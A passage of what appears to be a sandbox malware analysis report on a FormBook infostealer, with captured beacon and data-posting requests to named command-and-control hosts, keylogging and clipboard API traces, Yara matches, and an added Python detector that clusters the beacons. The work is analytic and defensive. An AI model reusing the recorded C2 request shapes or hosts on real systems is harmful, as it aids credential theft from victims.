4c 42 63 73 6b 6b 6a 37 68 58 71 31 57 33 4c 6c 72 49 6e 35 71 58 71 51 50 69 79 4f 73 52 64 2d 48 67 54 6c 37 5a 75 41 54 48 5a 31 52 61 68 6c 52 77 4b 41 59 72 68 76 7e 66 6e 49 37 64 79 48 79 37 4f 50 34 50 4f 67 30 43 38 43 56 37 65 6e 5a 6b 
6a 30 39 37 33 63 6a 41 44 77 49 79 35 45 4c 6c 61 39 28 47 76 6c 30 4e 32 6f 72 43 7e 52 59 7a 4e 69 47 6c 72 33 38 43 54 47 78 6d 78 53 32 2d 76 64 64 51 78 48 73 7a 79 53 7a 72 51 6b 55 4a 7a 36 58 44 35 67 7a 4e 45 6e 4f 2d 44 4b 62 4e 68 66 30 70 58 57 75 4e 51 6f 49 38 70 33 59 76 67 65 76 74 78 79 38 68 76 57 36 74 65 6d 4a 52 67 54 47 43 51 68 6b 4e 48 4f 70 6d 4e 45 49 61 73 58 66 4f 68 77 7a 63 4a 6e 68 67 54 32 6a 73 6a 35 5a 5a 6c 39 61 48 31 5a 74 47 6d 36 61 31 46 58 35 4f 6f 61 71 30 31 6f 33 2d 35 76 71 48 76 6f 35 72 69 65 64 5
 Source: global traffic HTTP traffic detected (GET beacons). All seven use the same /m8l/ path and the same tVT / MR-p parameter pair (order varies), carry no User-Agent, and send a seven-byte all-zero body; the query values use the standard base64 alphabet with + and /, whereas the POST bodies above use ( ) ~ _ - instead:
   GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1  Host: www.kmwhbl.com  Connection: close  Data Raw: 00 00 00 00 00 00 00  (listed twice in the report)
   GET /m8l/?tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH HTTP/1.1  Host: www.addis.tech  Connection: close  Data Raw: 00 00 00 00 00 00 00
   GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1  Host: www.nusaliterainspirasi.com  Connection: close  Data Raw: 00 00 00 00 00 00 00  (listed twice in the report)
   GET /m8l/?MR-p=0tPLH85x-lH&tVT=PZkH6llHoqFvvgYvV7p0jyJ4zE2wugCWkpTMu12MC83jrlv2PlfP15O4FxttxOVUzuUw HTTP/1.1  Host: www.teccommunications.com  Connection: close  Data Raw: 00 00 00 00 00 00 00
   GET /m8l/?tVT=HCt+Yhx/h4l+FCj3nKRKOvS7Xa1e0tc/Egfr+bgHKkeQjLAOt82B/JBt+eO2F9D4/3gd&MR-p=0tPLH85x-lH HTTP/1.1  Host: www.obsoletelabs.com  Connection: close  Data Raw: 00 00 00 00 00 00 00
   GET /m8l/?tVT=5W/5kEIdtxVt3n/xoeTRd2P1yDG4A43nFAD006cGMUhROXoTda6GZj7hA5S0bqxvW5XG&MR-p=0tPLH85x-lH HTTP/1.1  Host: www.artiyonq.com  Connection: close  Data Raw: 00 00 00 00 00 00 00
   GET /m8l/?MR-p=0tPLH85x-lH&tVT=dcH6q++BfneLHwYr+7wkAtOqeHmKUMZpIhb6VvBnwf4Bd/1QFFGV2dHI+mdn934ofCRD HTTP/1.1  Host: www.tgers.com  Connection: close  Data Raw: 00 00 00 00 00 00 00
 Performs DNS lookups
 Source: unknown DNS traffic detected: queries for: cdn.onenote.net
 Posts data to webserver
 Source: unknown HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.addis.techConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.addis.techUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.addis.tech/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 74 47 75 50 41 39 53 76 64 6f 49 51 66 53 51 4e 65 52 6f 6b 4c 51 35 54 46 41 6c 4f 6b 64 66 5a 62 75 30 44 6b 6e 7e 77 50 48 76 35 68 66 31 4b 53 6b 64 77 64 63 74 50 42 59 47 63 5a 68 34 7a 4a 59 69 34 73 54 4f 54 45 36 36 56 4a 66 53 66 74 7a 43 36 4e 56 37 6d 61 4a 79 73 70 30 46 56 51 31 42 62 47 61 48 4e 4e 6f 6f 41 4f 62 30 6d 54 31 52 5a 45 35 75 74 4b 7a 78 68 50 71 52 35 65 54 43 57 53 7a 49 6c 4c 69 7a 59 6f 72 28 62 4e 55 54 6d 6b 70 44 5a 79 61 7a 53 68 48 50 48 62 74 7e 5a 79 2d 4b 48 65 47 61 6d 38 45 64 2d 68 57 63 6a 6e 31 62 74 50 6e 63 4b 45 4e 67 6c 72 6a 67 46 4f 2d 43 52 4f 52 62 32 6f 53 44 45 71 36 62 58 48 37 76 33 49 4a 6f 74 52 57 73 71 4f 51 28 67 67 52 59 4f 54 49 56 77 6a 6e 7a 57 6e 4a 7e 72 42 61 44 76 70 70 76 5a 70 76 32 37 71 56 6c 79 56 7a 6c 34 36 4f 44 59 7a 66 55 44 65 79 49 6c 69 2d 30 73 74 78 49 4c 59 30 70 5a 4b 4c 48 55 4b 53 6c 6b 54 39 35 39 73 4f 43 45 38 56 53 6f 47 46 51 4e 5a 45 71 38 49 42 6d 4d 78 61 73 76 54 45 6f 6e 62 6a 41 52 51 44 63 44 53 77 36 50 31 6a 75 7a 39 43 73 35 73 76 28 50 31 79 72 64 45 44 39 62 6c 72 78 53 44 30 61 4f 6b 54 4d 4f 58 65 77 36 61 36 42 41 34 4d 36 38 43 34 34 4c 54 4a 43 39 63 36 37 64 43 6a 6e 57 37 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
tVT=tGuPA9SvdoIQfSQNeRokLQ5TFAlOkdfZbu0Dkn~wPHv5hf1KSkdwdctPBYGcZh4zJYi4sTOTE66VJfSftzC6NV7maJysp0FVQ1BbGaHNNooAOb0mT1RZE5utKzxhPqR5eTCWSzIlLizYor(bNUTmkpDZyazShHPHbt~Zy-KHeGam8Ed-hWcjn1btPncKENglrjgFO-CRORb2oSDEq6bXH7v3IJotRWsqOQ(ggRYOTIVwjnzWnJ~rBaDvppvZpv27qVlyVzl46ODYzfUDeyIli-0stxILY0pZKLHUKSlkT959sOCE8VSoGFQNZEq8IBmMxasvTEonbjARQDcDSw6P1juz9Cs5sv(P1yrdED9blrxSD0aOkTMOXew6a6BA4M68C44LTJC9c67dCjnW7g).
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/7.0.33Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: ; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Wed, 24 Jun 2020 01:54:03 GMTServer: LiteSpeedData Raw: 63 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 6d 6f db 38 12 fe 6c 03 f7 1f 14 16 4d 2c 54 6f b6 93 d8 71 2c 17 6d da de ed 6d bb ed b5 dd 3b 1c 36 c5 62 2c d1 32 6d 8a d4 92 b4 9d 5c 9a ff 7e 20 25 45 b2 f3 e6 74 0d dc e5 43 c4 d7 e1 33 c3 99 e1 70 e8 e1 de 9b 8f 67 5f ff fd e9 ad 35 55 29 1d 35 87 fa 63 51 60 49 88 30 43 a3 66 73 38 c5 10 8f 9a 8d 61 8a 15 58 d1 14 84 c4 2a 44 bf 7e 7d e7 f6 91 e5 df f4 30 48 71 88 96 04 af 32 2e 14 b2 22 ce 14 66 2a 44 2b 12 ab 69 18 e3 25 89 b0 6b 2a 8e 45 18 51 04 a8 2b 23 a0 38 6c eb 75 1a 43 4a d8 dc 12 98 86 28 13 7c 42 28 46 d6 54 e0 49 88 a6 4a 65 03 df 4f d2 2c f1 b8 48 fc 8b 09 f3 db ed 62 f1 da 2c c2 92 31 44 f3 8d 69 6c 21 81 12 85 05 10 26 33 22 40 12 2f e2 a9 7f 91 52 91 45 5e 36 cd 0c a5 66 63 a8 88 a2 78 f4 09 12 6c 31 ae ac 09 5f b0 78 e8 e7 ad cd 0a de 41 cc a4 9b 09 3c c1 2a 9a 1e e4 18 0f 7c ff 9e 75 0e b4 8c 1e 9d 2c 03 6f 95 69 58 5b 0e f7 12 01 4b 50 20 b6 9f 33 e1 4c 49 2f e1 3c a1 18 32 22 b7 9f 29 bd 95 96 fb 06 34 04 54 61 c1 40 61 64 a9 cb 0c 87 08 b2 8c 92 08 14 e1 cc 17 52 be b8 48 29 b2 8c f8 42 64 ed 0b f8 63 c1 4f ad 77 18 c7 5b ee d0 04 e3 d8 37 9b 53 c9 ef 07 57 3d e3 69 8a 99 92 4f 59 3e 2a e6 f8 15 8e 46 63 28 23 41 32 55 70 ac f0 85 f2 67 b0 84 bc 15 8d 9a 8d 46 63 45 58 cc 57 de ef ab 0c a7 7c 46 be 60 a5 08 4b a4 15 5a 57 68 0c 12 ff 2a 28 1a 18 a5 96 83 73 ff dc 2f c4 7b ee 93 14 12 2c cf fd 88 0b 7c ee 9b c9 e7 7e bb ed 75 bc e0 dc ef 75 2e 7a 9d 73 1f 39 08 5f 28 34 40 5e c6 12 e4 20 b9 4c 7e 8c 9e 5c 26 86 9a 5c 26 6f 73 82 72 69 08 f2 85 88 30 1a 5c a1 88 b3 08 94 81 51 e0 35 70 ef d1 f3 
73 7f 95 b9 84 45 74 11 6b 1e 66 d2 34 98 d9 ae c0 14 83 c4 5e 4a 98 37 93 e8 fa fa 54 cb 69 6f b2 60 91 56 96 16 38 63 27 b2 af ca ba 15 eb 16 fb 6a 09 c2 8a c2 2f 4a 10 96 78 13 c1 d3 b3 29 88 33 1e e3 53 ea 45 14 83 f8 8c 23 d5 0a 9c c0 99 7b b9 63 99 7b 53 4c 92 a9 b2 1d ea 4d 08 a5 5f f1 85 6a 45 9e 56 cc cb 96 9a 12 e9 80 ed 04 4e 60 9f 6a da 71 38 f7 14 7f 03 0a 7e fd fc be 65 ff 09 aa e3 1a 55 bc 41 55 60 b5 10 cc 8a c3 30 c4 d7 37 2c e2 16 e4 0c 8e 4f c9 a4 b5 47 bf 7f df ab 20 db f9 9c bd f6 a9 5c 11 15 4d 5b d4 d3 9a f6 1a 24 a6 84 e1 10 29 9e 21 cd 22 d7 0e f6 38 08 ac 6e 27 bb b0 5e 09 02 14 39 60 5f 45 20 31 9a 50 48 d0 a0 20 d5 1a 87 71 eb b7 a3 a3 ee d1 b1 73 74 dc ef 1c 3b 37 e5 f6 c9 37 67 ad a7 df 09 ba 6b dd b6 bd bf bf 46 a0 d7 ed 76 9c a3 e3 76 a7 ef 1c 1d 1f 76 ba 55 b9 ad 5b ca f6 76 55 ee 06 55 b9 3e fe b0 57 2d 6e a8 e6 8b df 90 e8 3a eb 0d ed fe 46 43 a7 bd d1 d0 0d 36 1a 3a 9b 34 0e 7b df 6c 67 6f 6c 9f 1a 31 15 0a 5e 6c d3 8d 98 34 1f bd e3
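The traffic recorded above has a fixed shape: one URI (/m8l/) and one pair of parameter names (tVT, MR-p) reused across seven hosts, every POST carrying the same Trident/7.0 User-Agent, Connection: close, and Origin/Referer headers that point back at the host being contacted, with two body sizes (409 and 142745 bytes) repeated per host. The script below is an added example, not code from the sandbox report or from any FormBook tooling: it groups raw HTTP requests by (method, path, parameter names), flags shapes that fan out over three or more hosts, and scores that header pattern per request. The sample requests are constructed here from the hosts, parameter names and header values recorded in this report; the POST bodies are shortened prefixes of the recorded tVT values (the www.obsoletelabs.com prefix decoded from its Data Raw hex), the www.example.com request is a constructed benign control, and the 40-character opaque-value floor and three-host minimum are tuning choices, not values from the report.

```python
"""Cluster FormBook-style HTTP beacons by request shape.

Added example, not code from the sandbox report: groups raw HTTP/1.1 requests by
(method, path, parameter names), flags shapes that fan out over several hosts, and
scores the fixed header pattern this sample used on every POST.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent recorded on every POST in this report.
FORMBOOK_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) "
               "like Gecko")
# Long run of base64-like characters; the recorded payloads also use ( ) ~ _ - .
# The 40-character floor is a tuning choice, not a value from the report.
OPAQUE = re.compile(r"^[A-Za-z0-9+/=()~_.\-]{40,}$")


def _split_params(encoded):
    """Split 'k=v&k2=v2' without plus/percent decoding so raw values stay comparable."""
    params = {}
    for pair in encoded.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[name] = value
    return params


def parse_request(raw):
    """Parse one raw HTTP/1.1 request (CRLF line endings) into a dict."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = _split_params(url.query)
    if method == "POST" and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        params.update(_split_params(body))
    return {"method": method, "path": url.path, "params": params,
            "host": headers.get("host", ""), "headers": headers}


def beacon_indicators(req):
    """Header-level indicators matching the pattern seen on this sample's POSTs."""
    h, hits = req["headers"], []
    if h.get("user-agent") == FORMBOOK_UA:
        hits.append("fixed Trident/7.0 UA")
    if h.get("connection", "").lower() == "close":
        hits.append("Connection: close")
    origin = "http://" + req["host"]
    if h.get("origin") == origin and h.get("referer") == origin + req["path"]:
        hits.append("Origin/Referer self-referential")
    names = list(req["params"])
    if names and all(len(n) <= 4 for n in names) and any(
            OPAQUE.match(v) for v in req["params"].values()):
        hits.append("short parameter names with long opaque values")
    return hits


def find_c2_clusters(raw_requests, min_hosts=3):
    """Map (method, path, frozenset of parameter names) -> sorted hosts for shapes seen on min_hosts+ hosts."""
    hosts_by_shape = defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        shape = (req["method"], req["path"], frozenset(req["params"]))
        hosts_by_shape[shape].add(req["host"])
    return {shape: sorted(hosts) for shape, hosts in hosts_by_shape.items()
            if len(hosts) >= min_hosts}


def _req(method, host, path="/m8l/", query="", body=""):
    """Build a constructed sample request carrying the header set recorded in the report."""
    target = path + ("?" + query if query else "")
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", "Connection: close"]
    if method == "POST":
        lines += [f"Content-Length: {len(body)}", "Cache-Control: no-cache",
                  f"Origin: http://{host}", f"User-Agent: {FORMBOOK_UA}",
                  "Content-Type: application/x-www-form-urlencoded", "Accept: */*",
                  f"Referer: http://{host}{path}", "Accept-Language: en-US",
                  "Accept-Encoding: gzip, deflate"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


SAMPLE_REQUESTS = [
    # GET beacons: one path, two parameter names in varying order, rotating hosts.
    _req("GET", "www.kmwhbl.com", query="tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH"),
    _req("GET", "www.addis.tech", query="tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH"),
    _req("GET", "www.nusaliterainspirasi.com", query="MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ"),
    # POSTs: shortened prefixes of the recorded tVT bodies, not full captures.
    _req("POST", "www.obsoletelabs.com", body="tVT=PghEGG4Ey4Umay3rsqQIJoivXvBU~t50C3XsqrcgMhrbs5gqidLH5ZQD8sHVKPbIjG"),
    _req("POST", "www.artiyonq.com", body="tVT=x0zD6gpMvRVln1(e15OIBWzOkya3GLnAZlj2moU-O2JBA3YvULHhbDDga6nOe_dkOqa929YTHvbkqo"),
    _req("POST", "www.tgers.com", body="tVT=V-LA0YXWCWOFbjRd~t09WKOEQ3iXdtl3TxL5T_hb0KMjPt5YPmfQzYOPjX9k62czDBAnaXu_Ajf"),
    _req("POST", "www.addis.tech", body="tVT=tGuPA9SvdoIQfSQNeRokLQ5TFAlOkdfZbu0Dkn~wPHv5hf1KSkdwdctPBYGcZh4zJYi4sTOTE66V"),
    # Constructed benign control: different path and parameter shape, one host only.
    "GET /search?q=hello HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n\r\n",
]

if __name__ == "__main__":
    for shape, hosts in find_c2_clusters(SAMPLE_REQUESTS).items():
        print(shape[0], shape[1], sorted(shape[2]), "->", ", ".join(hosts))
    for raw in SAMPLE_REQUESTS:
        print(parse_request(raw)["host"], beacon_indicators(parse_request(raw)))
```

Run directly it prints the two clusters (the GET beacon shape over three hosts and the POST shape over four) and the per-request indicator list; in a pipeline, feed it requests reconstructed from proxy logs or a PCAP export. The heuristic deliberately stays at the envelope level: matching on the tVT payload itself would need the encoding and key material of this build, which the report does not recover.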
 Urls found in memory or binary data
 Source: explorer.exe, 00000009.00000000.831639365.0000000000CF0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
 Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp Strings found in binary or memory:
   http://fontfabrik.com
   http://www.apache.org/licenses/LICENSE-2.0
   http://www.carterandcone.coml
   http://www.fonts.com
   http://www.founder.com.cn/cn
   http://www.founder.com.cn/cn/bThe
   http://www.founder.com.cn/cn/cThe
   http://www.goodfont.co.kr
   http://www.jiyu-kobo.co.jp/
   http://www.sajatypeworks.com
   http://www.sakkal.com
   http://www.sandoll.co.kr
   http://www.tiro.com
   http://www.typography.netD
   http://www.zhongyicts.com.cn
 All of these were scraped from explorer.exe's own memory (process 9), not from the sample: the first is a printf-style template (note the %s) with trailing bytes, and the rest are type-foundry and font-licence URLs, with the trailing-character noise (coml, netD, bThe) typical of strings pulled out of font tables. None of them is C2 for this sample; the contacted infrastructure is the /m8l/ host set recorded above.

 Contains functionality for read data from the clipboard / Contains functionality to read the clipboard data (two signature names, one piece of evidence)
 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E46B0C OpenClipboard, IsClipboardFormatAvailable, IsClipboardFormatAvailable, GetClipboardData, CloseClipboard, GlobalLock, CloseClipboard, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalLock, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalLock, DragQueryFileW, DragQueryFileW, DragQueryFileW, GlobalUnlock, CountClipboardFormats, CloseClipboard
 Contains functionality to retrieve information about pressed keystrokes
 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E32B37 GetKeyboardState, GetAsyncKeyState, GetKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState
 Potential key logger detected (key state polling based) (no source is listed for this signature in the report)
 Both code functions are in process 6 (RFQ.exe.exe), the same process whose 0xE9E000 region and code function 6_2_00DF3D19 carry the "third-party compiled AutoIt script" marker below. A clipboard reader that probes three formats and enumerates dropped files with DragQueryFileW, and a GetAsyncKeyState/GetKeyState polling sequence, are consistent with the AutoIt runtime's built-in clipboard and key-state functions, so weigh these two signatures as wrapper capability rather than as evidence specific to the FormBook payload, which the Yara matches below place in the unpacked images of processes 8 and 29.

### E-Banking Fraud

 Yara detected FormBook
 Source: Yara match File source (type: MEMORY):
   0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp
   0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp
   0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp
   00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp
   00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp
   0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp
   00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp
 Source: Yara match File source (type: UNPACKEDPE):
   29.2.ebplgh1bmx.exe.400000.1.unpack
   8.2.RFQ.exe.exe.400000.0.unpack
 Reading the dump names: the first field is the process id in hex (0x8 = RFQ.exe.exe and 0x1D = 29 = ebplgh1bmx.exe, matching the two unpacked PEs), the fourth is the region base address and the fifth its page protection. The two 0x401000 regions carry 0x20 (PAGE_EXECUTE_READ) and are the code sections of the 0x400000-based images that were dumped; the other five carry 0x40 (PAGE_EXECUTE_READWRITE), i.e. RWX allocations of the kind left behind by injection. Process 0x1E (30) shows a hit only in such an RWX region at 0x2550000, with no dumped image.

### System Summary

 Detected FormBook malware (no separate source listed; the evidence is the Yara matches below)
 Malicious sample detected (through community Yara rule)
 Every source below matched both community rules:
   Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
   Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
 Sources (type: MEMORY):
   0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp
   0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp
   0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp
   00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp
   00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp
   0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp
   00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp
 Sources (type: UNPACKEDPE):
   29.2.ebplgh1bmx.exe.400000.1.unpack
   8.2.RFQ.exe.exe.400000.0.unpack
 Binary is likely a compiled AutoIt script file
 Source: RFQ.exe.exe (on disk) and its 0xE9E000 image region in processes 0, 6, 7 and 8 (dumps 00000000.00000000.762180934, 00000006.00000000.813152196, 00000007.00000000.817261592 and 00000008.00000002.883444662, each .0000000000E9E000.00000002.00020000.sdmp) String found in binary or memory: This is a third-party compiled AutoIt script.
 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: This is a third-party compiled AutoIt script. 6_2_00DF3D19
 Source: the same file and dumps String found in binary or memory (one string block, identical in every copy; the report repeats it once per dump):
   SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
 The block corroborates the marker: it contains AutoIt's advanced-window-description keywords ([CLASS:, [REGEXPTITLE:, [HANDLE:, [ACTIVE], [LAST]) and the AutoIt3GUIContainer window class, so RFQ.exe.exe is the AutoIt interpreter stub carrying the script that unpacks and injects the FormBook payload found in processes 8 and 29.
 Contains functionality to call native functions